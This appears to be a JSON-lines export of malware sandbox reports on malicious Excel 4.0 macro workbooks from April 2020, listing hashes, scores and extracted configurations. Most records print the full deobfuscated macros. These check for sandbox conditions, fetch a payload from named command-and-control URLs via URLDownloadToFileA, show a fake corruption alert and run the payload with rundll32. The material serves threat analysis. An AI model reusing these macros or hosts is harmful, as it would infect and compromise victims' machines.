CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"i2sQ8AAChV\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5b2eafe1c246181008fd0f55dc535f80ef337e0aadde14948bb3eb87832cb910"},"analysis":{"reported":"2020-04-09T16:16:28Z","score":10},"files":[{"filename":"5b2eafe1c246181008fd0f55dc535f80ef337e0aadde14948bb3eb87832cb910","filesize":147968,"md5":"34b6916d30d20da3d74056bea552b313","sha1":"6fab507695870090c6017c29d3f32d5ab5dc2e53","sha256":"5b2eafe1c246181008fd0f55dc535f80ef337e0aadde14948bb3eb87832cb910","sha512":"005feb9e3416cce429058391f3d8c002722508d5eb1bffc77c7b29f6230b32d8282fc3430cd635136660f7e2e516b7fdec8698bcf2aaa662bee796f08d5df1cc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5b2eafe1c246181008fd0f55dc535f80ef337e0aadde14948bb3eb87832cb910.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"otNHTyLgap\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5b34915cd88f3f640f127be2b6d4242cfb018d21c77f0aef70208f1551aef638"},"analysis":{"reported":"2020-04-09T16:16:28Z","score":10},"files":[{"filename":"5b34915cd88f3f640f127be2b6d4242cfb018d21c77f0aef70208f1551aef638","filesize":207360,"md5":"ef6bcce5ead52823fbb9d7ce426b7e55","sha1":"a6aa8c7eeb8e8b843f7ff4bbb43b3734c61dd3bc","sha256":"5b34915cd88f3f640f127be2b6d4242cfb018d21c77f0aef70208f1551aef638","sha512":"ef6e780280d4022cc555c059b3fa8bd132bd144a7a83e4b31005d40e2e7eabad94b79116d79130ceba48147eb627d93189125f698ab62b85c3d8a5a57252b1b2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5b34915cd88f3f640f127be2b6d4242cfb018d21c77f0aef70208f1551aef638.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://greentec-automation.com/wp-cran.php","https://narensyndicate.com/wp-cran.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://greentec-automation.com/wp-cran.php\",\"c:\\Users\\Public\\cskc75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://narensyndicate.com/wp-cran.php\",\"c:\\Users\\Public\\cskc75ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cskc75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"stMEBVlxD7\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5b380f0a54a2f439e4e6a7b663a7fa6353d60692d2cf8e532badcfe463983568"},"analysis":{"reported":"2020-04-09T16:16:28Z","score":10},"files":[{"filename":"5b380f0a54a2f439e4e6a7b663a7fa6353d60692d2cf8e532badcfe463983568","filesize":177152,"md5":"6507c8bdb693b266fdf04eddcb20a2fa","sha1":"4020d799a932f97f51d6ad6b887d27482d1d9b85","sha256":"5b380f0a54a2f439e4e6a7b663a7fa6353d60692d2cf8e532badcfe463983568","sha512":"256ccc95861b2a88678886a8295de9a56911772c3dd0b19dc46db19fe3466ea2326b9b7ba6a259d30b0276cd8fb9d1c9ad9d4606ae32e3fa717f5bf9ec49e517","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5b380f0a54a2f439e4e6a7b663a7fa6353d60692d2cf8e532badcfe463983568.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"T1S2myUD8N\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5b3ab0f6db1575c185e3ce6474daa672c88c9a691b86376e0ddfa670b537dd96"},"analysis":{"reported":"2020-04-09T16:16:28Z","score":10},"files":[{"filename":"5b3ab0f6db1575c185e3ce6474daa672c88c9a691b86376e0ddfa670b537dd96","filesize":144384,"md5":"c6efa9e90361f4805e37c6e79259d798","sha1":"d4dfb119a9ee1b99d7011d3d09fec1339c33aa63","sha256":"5b3ab0f6db1575c185e3ce6474daa672c88c9a691b86376e0ddfa670b537dd96","sha512":"9c35f53ac215f119268ad63e7ce2750f053d45cc9beb1d405b4aa937ce5c17ba3807181f1f1bcff252df3d219255fae28d2ec5f3bd1ab3584aca84f305e8328e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5b3ab0f6db1575c185e3ce6474daa672c88c9a691b86376e0ddfa670b537dd96.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"t11wn2hQ5G\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5b401dbc5c2698c1a91aaaa98df94d352880a929f84eb99900859ccf87dc4605"},"analysis":{"reported":"2020-04-09T16:16:28Z","score":10},"files":[{"filename":"5b401dbc5c2698c1a91aaaa98df94d352880a929f84eb99900859ccf87dc4605","filesize":185344,"md5":"9d816b02fe501db324f722a9e96c2f36","sha1":"4a6bc7ecaad8e21b6717ddaa50338148134fbcb6","sha256":"5b401dbc5c2698c1a91aaaa98df94d352880a929f84eb99900859ccf87dc4605","sha512":"dad585197f08082a3c9cee63a21bf0961a2256338063b6e257759bfeebbb98254a4c83a9fea4a89e35eaa9524e31caf0c817a0af3c60f54ede13308400322390","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5b401dbc5c2698c1a91aaaa98df94d352880a929f84eb99900859ccf87dc4605.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5b42c7165c3543f6b9835610126944d6dfb23a53e3a49bc24f3a6329f3c1b34d"},"analysis":{"reported":"2020-04-09T16:16:28Z","score":10},"files":[{"filename":"5b42c7165c3543f6b9835610126944d6dfb23a53e3a49bc24f3a6329f3c1b34d","filesize":168960,"md5":"39b2e9e9901761c31d9c91cbc6aef6db","sha1":"8ac06351bf7851cf89e3606121ca446695ef27df","sha256":"5b42c7165c3543f6b9835610126944d6dfb23a53e3a49bc24f3a6329f3c1b34d","sha512":"9e21869173c3b9c80f501d14876c132e4dab73647908a0cc3568df7545991956b39138bd19dea0572e7c768ef7ff563a5eda6c2f575abbf62b7c3844d06e2f00","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5b42c7165c3543f6b9835610126944d6dfb23a53e3a49bc24f3a6329f3c1b34d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HhP1c3y4m7\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5b4ecd73a9331304368c8b956f8a5f2a63d04bf88ab0f6772a63cc00950fce72"},"analysis":{"reported":"2020-04-09T16:16:29Z","score":10},"files":[{"filename":"5b4ecd73a9331304368c8b956f8a5f2a63d04bf88ab0f6772a63cc00950fce72","filesize":168960,"md5":"08c718a9d5b4b624096616295088e3fb","sha1":"87962eeb6d0f6fde896c94b45fee805932d2b9e9","sha256":"5b4ecd73a9331304368c8b956f8a5f2a63d04bf88ab0f6772a63cc00950fce72","sha512":"6a1e627d1bbb8ee97fb74a15ddc74d7b0d82f52ebcac9d58735fe7f5580fc9c4f452459418ba930a3265d6325f885d460ce541db7bb1736ddc6135d77f67d757","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5b4ecd73a9331304368c8b956f8a5f2a63d04bf88ab0f6772a63cc00950fce72.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4suVxSEzSj\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5b4ee9aea69ffc22fa82135eb3e4313825619e9f01eee4d5af7f9e69d6ec1e52"},"analysis":{"reported":"2020-04-09T16:16:29Z","score":10},"files":[{"filename":"5b4ee9aea69ffc22fa82135eb3e4313825619e9f01eee4d5af7f9e69d6ec1e52","filesize":185344,"md5":"771f2eee4b821a32168f6ed70300817e","sha1":"6f8480210bd64be3de36e553f8bae6fe01cb3043","sha256":"5b4ee9aea69ffc22fa82135eb3e4313825619e9f01eee4d5af7f9e69d6ec1e52","sha512":"5dc84971408ab300a70226af220f93d52bc0bba088a4b12b5c7a8026451a0c6cd55faed498b7d99d449a682ae459dc4fc0ae09d71de639bc265b0741dae193ee","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5b4ee9aea69ffc22fa82135eb3e4313825619e9f01eee4d5af7f9e69d6ec1e52.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5b5b19503a0e7b6d12e191e684675083bdafd13cb944b4bfdd798578f74c61ae"},"analysis":{"reported":"2020-04-09T16:16:29Z","score":10},"files":[{"filename":"5b5b19503a0e7b6d12e191e684675083bdafd13cb944b4bfdd798578f74c61ae","filesize":167936,"md5":"77db60709169f3337df06ad29d8eb30b","sha1":"ef4024799f3f01cdda321686302dda3007c41be7","sha256":"5b5b19503a0e7b6d12e191e684675083bdafd13cb944b4bfdd798578f74c61ae","sha512":"cc352f6bf37fa5a212343a6964d2b89433893039ef6bd935fe241efa99697e485f72683e4441bc3bd63b3d8c8da4709f9d743e678aa3bdbce0b54e6f01c29999","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5b5b19503a0e7b6d12e191e684675083bdafd13cb944b4bfdd798578f74c61ae.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vBu6zEFE5P\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5b638b880a290cf3f3a93ae55f9b3c170301f62ae6910bdf26cb889b070fe01d"},"analysis":{"reported":"2020-04-09T16:16:29Z","score":10},"files":[{"filename":"5b638b880a290cf3f3a93ae55f9b3c170301f62ae6910bdf26cb889b070fe01d","filesize":113664,"md5":"be65caf48e893fec9baa508c46247ff3","sha1":"2457763a0dd68d81efceb7bdeb30a9ca92b77d86","sha256":"5b638b880a290cf3f3a93ae55f9b3c170301f62ae6910bdf26cb889b070fe01d","sha512":"52cc006d4463dbb8c77ac1e5ac69b4d10dea33785f8c429a94b6cc63cadbd456dd01fe748bbd8e3cd96ce9ef6bb4b256c1ea8ceefa9bba5d5db88196afc18550","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5b638b880a290cf3f3a93ae55f9b3c170301f62ae6910bdf26cb889b070fe01d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"YAvOGo88CK\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5b6ed91d823b988adb19f41e82ea27adea4d3b74f84665806a6fe5dcb74105e4"},"analysis":{"reported":"2020-04-09T16:16:29Z","score":10,"tags":["macro"]},"signatures":[{"name":"Suspicious Office macro","score":8,"tags":["macro"],"yara_rule":"office_macro_on_action","desc":"Office document macro which triggers in special circumstances - often malicious."}],"files":[{"filename":"5b6ed91d823b988adb19f41e82ea27adea4d3b74f84665806a6fe5dcb74105e4","filesize":709632,"md5":"adfd3d8e5ee09c1082e2c10e5b00772f","sha1":"86ee35133a1733a88bec3bf53c7554166c4d4c2b","sha256":"5b6ed91d823b988adb19f41e82ea27adea4d3b74f84665806a6fe5dcb74105e4","sha512":"a94f6d9bd21248fbb12558367b8d74fad076d896d3f14265bc744679345649d8d9eba9df98e78c81579f1424b72e017c9fe48d5069e6105190e6a2992bc23179","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5b6ed91d823b988adb19f41e82ea27adea4d3b74f84665806a6fe5dcb74105e4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"HYPERLINK(\"http://a.hiphotos.baidu.com/album/pic/item/29381f30e924b89927f5c2f46e061d950b7bf635.jpg\",\"\")\nHYPERLINK(\"http://a.hiphotos.baidu.com/album/pic/item/29381f30e924b89927f5c2f46e061d950b7bf635.jpg\",\"\")\nLEFT(SUBSTITUTE(SUBSTITUTE(SUBSTITUTE(\"118.244.78.30 s.taobao.com indivual line. Tdss individual line|118.244.78.30 tao.etao.com indivual line. The IP addss individress |118.244.78.30 s.etao.com indivuale I|118.244.78.30     search.paipai.com          # source server |118.244.78.30     search1.paipai.com              # x client hostl line. Th|118.244.78.30       tmall.com|118.244.78.30     list.tmall.com  ndivual line. Tdss individual line. The IP |com indivual line. Tdss individual li|com indivual line. Tdss individual line|divual line. Tdss individual line. The IP }j]=[k{m indivual line. Tdss individual line. The IP k|obo.com indivual line. Tdss individual line. The I|ao.com indivual line. Tdss individual line. The IP }m]=[n{obo.com indivual line. Tdss individual line. The IP \",\"|\",\"\n\"),\"[{\",),\"}]\",),1)\nSUBSTITUTE(SUBSTITUTE(SUBSTITUTE(\"118.244.78.30 s.taobao.com indivual line. Tdss individual line|118.244.78.30 tao.etao.com indivual line. The IP addss individress |118.244.78.30 s.etao.com indivuale I|118.244.78.30     search.paipai.com          # source server |118.244.78.30     search1.paipai.com              # x client hostl line. Th|118.244.78.30       tmall.com|118.244.78.30     list.tmall.com  ndivual line. Tdss individual line. The IP |com indivual line. Tdss individual li|com indivual line. Tdss individual line|divual line. Tdss individual line. The IP }j]=[k{m indivual line. Tdss individual line. The IP k|obo.com indivual line. Tdss individual line. The I|ao.com indivual line. Tdss individual line. The IP }m]=[n{obo.com indivual line. Tdss individual line. The IP \",\"|\",\"\n\"),\"[{\",),\"}]\",)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5b7de23261f40c9670fcae654dab38dfbad9d8604d33ce607e847bfe3f9df409"},"analysis":{"reported":"2020-04-09T16:16:29Z","score":10},"files":[{"filename":"5b7de23261f40c9670fcae654dab38dfbad9d8604d33ce607e847bfe3f9df409","filesize":104448,"md5":"e2f08263576606841b147198158a252c","sha1":"1912f05f4b87183dae5fd66986faa2edfeee09cd","sha256":"5b7de23261f40c9670fcae654dab38dfbad9d8604d33ce607e847bfe3f9df409","sha512":"778cf98acdcf46c11987e6ab9aa5248450f665c8bcfed50febc54942374efc1e88ba8a5ec316077f4d01a348fe99cbc4ce3b99d189aab3ceed744e82304d91d9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5b7de23261f40c9670fcae654dab38dfbad9d8604d33ce607e847bfe3f9df409.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"u9d54Qj22J\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5b8437dd4648e16c5d974db67c1c803fa5fd3abdf07d908dbcda4ab4ee05ad43"},"analysis":{"reported":"2020-04-09T16:16:29Z","score":10},"files":[{"filename":"5b8437dd4648e16c5d974db67c1c803fa5fd3abdf07d908dbcda4ab4ee05ad43","filesize":185344,"md5":"8fb2a4aae051eecf10aae22f83bbd359","sha1":"1ab7191b1b9603bb2f5a336c09dc1f2832dc3274","sha256":"5b8437dd4648e16c5d974db67c1c803fa5fd3abdf07d908dbcda4ab4ee05ad43","sha512":"f2d7de57e2237728c99ee188329c8645e3544025460343ff4a01f6a0cf8f9c66002bee174fd3ee9d41e69ff4d714557588c8b833f0b6b814b875575e60d8d24c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5b8437dd4648e16c5d974db67c1c803fa5fd3abdf07d908dbcda4ab4ee05ad43.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5b942a21c25487dc2ad0199fb58b6f5062195008d06c6d4831dab2e0ec94bd4d"},"analysis":{"reported":"2020-04-09T16:16:29Z","score":10},"files":[{"filename":"5b942a21c25487dc2ad0199fb58b6f5062195008d06c6d4831dab2e0ec94bd4d","filesize":219136,"md5":"361e70832194762a0ff9488c0f65acb2","sha1":"a14eefa2339d849e316936132966a7260ba38186","sha256":"5b942a21c25487dc2ad0199fb58b6f5062195008d06c6d4831dab2e0ec94bd4d","sha512":"aa192e02f4b3731e7c2f14418fea7aae93a9ef594e3da2dac4d8627fa01caf51caafd07853a68405411dfae724e9b7f8103a3e4fc433c51f34c5e04ec123c4ab","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5b942a21c25487dc2ad0199fb58b6f5062195008d06c6d4831dab2e0ec94bd4d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rFmqEcHLKV\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5b9d8e981fc6610088f36667c65b4a6be86fcb30e4ac046c2d6a35872d75b006"},"analysis":{"reported":"2020-04-09T16:16:29Z","score":10},"files":[{"filename":"5b9d8e981fc6610088f36667c65b4a6be86fcb30e4ac046c2d6a35872d75b006","filesize":112128,"md5":"c6cae1ec0c8e2e2fca7d7abc37b7138c","sha1":"eb9b886cf2ae5d409dca45e01a2175f8fc4f1464","sha256":"5b9d8e981fc6610088f36667c65b4a6be86fcb30e4ac046c2d6a35872d75b006","sha512":"a61c2e86046904ec6f3183c822f8782f68ccf45139c9c53b40d28ad9a3c50dfa107ada65479efecdfbfc4efb77cd352ef0c3be6ad10f93143ef2f8a9f727aaec","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5b9d8e981fc6610088f36667c65b4a6be86fcb30e4ac046c2d6a35872d75b006.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5bb00d4b518edbd6c50730c956c0318c5e5b7515e3d2972c3de6e62362a4563d"},"analysis":{"reported":"2020-04-09T16:16:30Z","score":10},"files":[{"filename":"5bb00d4b518edbd6c50730c956c0318c5e5b7515e3d2972c3de6e62362a4563d","filesize":55808,"md5":"9db7661aecec812fc47e2a2d0aae1e76","sha1":"67ac8af3c12335c202eb706a5475dafee8c80c66","sha256":"5bb00d4b518edbd6c50730c956c0318c5e5b7515e3d2972c3de6e62362a4563d","sha512":"c6ec72c87fec575ea600e28cee8322a8abc8016539ad9556f3b1835de49056b5a4b498b211937793cfe1d9abb84723659844e005870f216714818deeb2f84c20","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5bb00d4b518edbd6c50730c956c0318c5e5b7515e3d2972c3de6e62362a4563d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(R$18C$9,R$19C$9)"}}}]}
